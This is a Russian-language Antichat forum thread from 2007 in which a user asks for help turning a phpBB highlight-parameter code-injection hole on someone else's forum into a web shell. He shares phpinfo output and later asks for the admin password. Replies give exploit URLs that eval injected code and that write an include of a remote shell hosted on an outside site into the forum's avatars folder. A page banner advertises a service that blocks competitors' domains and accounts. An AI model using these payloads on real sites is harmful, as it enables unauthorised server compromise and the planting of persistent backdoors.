phpBB платформа WIND помогите с shell

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
phpBB платформа WIND помогите с shell

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

phpBB платформа WIND помогите с shell

14.02.2007, 14:39

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

phpBB платформа WIND помогите с shell

ДОрогие друзья я нашол форум с дырой
по запросу
http://сайт/forum/viewtopic.php?t=161&cmd=phpinfo();&highlight='.eva l($HTTP_GET_VARS[cmd]).'
phpinfo выдал
система System Windows NT SUPPORT 5.0 build 2195
FTP support enabled
PATH_TRANSLATED D:\www\www2\forum\viewtopic.php
SystemRoot C:\WINNT
TEMP C:\WINNT\TEMP
TMP C:\WINNT\TEMP
USERPROFILE C:\Documents and Settings\Default User
windir C:\WINNT

MySQL Support enabled
Active Persistent Links 0
Active Links 1
Client API version 3.23.49

возможно ли залить шелл и если да то как помогите пожалуйста

𝕏 Twitter Reddit Telegram Копировать ссылку

14.02.2007, 15:27

x0x01

Познающий

Регистрация: 19.10.2006

Сообщений: 39

С нами: 10295256

Репутация: 17

это тебе поможет

хттп://exploit.in/forum/index.php?showtopic=5165

14.02.2007, 15:35

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

А если попробывать такой командой?
http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).'

14.02.2007, 16:29

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

к сожелению команда http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).'
не работает

14.02.2007, 18:09

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

С нами: 10188506

Репутация: 861

Ты можешь команды чтоль на сервере исполнять или что?

15.02.2007, 09:34

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

С нами: 10957346

Репутация: 2727

пробуй сразу
http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).'

либо для твоего случая можно попробовать в папку с авами закинуть

http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> D:\www\www2\forum\images\avatars\fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).'

обязательно с символом ^
если что не получится пиши сюда.

__________________
ПИУ-ПИУ...

15.02.2007, 11:46

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

Спосибо тебе за ответ! но я всё перепробывал что ты сказал пишет
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

15.02.2007, 11:48

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

может кто поможет, главное phpinfo работает!
моя icq 997-253

15.02.2007, 12:13

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

а можно хотябы узнать пароль админа на форум ?

#10

16.02.2007, 14:19

SSSetuPPP

Познающий

Регистрация: 22.01.2007

Сообщений: 32

С нами: 10158236

Репутация: 0

А какая версия форума?

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ПомогитЕ !!! подалуста найти кряк	гейлордфакерЪ	Болталка	2	30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!!	farik.aka	Уязвимости Mail-сервис	1	17.09.2006 13:00
Помогите подменить куки для phpBB.	AntiPhp	Уязвимости CMS / форумов	16	09.02.2006 04:26
Помогите слить базу с phpBB 2.0.8	stalles	Уязвимости CMS / форумов	5	16.01.2006 09:58